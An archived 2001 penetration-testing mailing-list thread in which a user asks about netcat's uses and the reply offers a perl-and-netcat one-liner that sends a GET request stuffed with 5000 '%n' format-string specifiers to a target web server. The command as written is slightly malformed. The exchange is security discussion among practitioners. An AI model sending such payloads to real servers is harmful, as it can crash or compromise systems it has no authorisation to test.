Penetration Testing mailing list archives

Re: Ideas on netcat

From: Dave Aitel <daitel () atstake com>
Date: Mon, 27 Aug 2001 17:36:48 -0400

It's easy and fun to write small web requests with netcat. Try this:

perl -e 'print "GET /"; print "%n" x 5000; print "HTTP/1.0\n\n" | nc target 80

-dave

Vo0d0o wrote:

To all netcat gurus,

I hav been experimentin on netcat for a few days and searchin almost everyday on netcat for some possible uses ,but
in vain.

As far as I know, no site is giving some other uses of netcat pertaining to pen-testing ...other than the usual
*README* file which I find too basic.

I would be grateful if anybody could throw some light on uses of netcat in pen-testing.

Thanx in advance.

Cheers,
Kartik.

This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/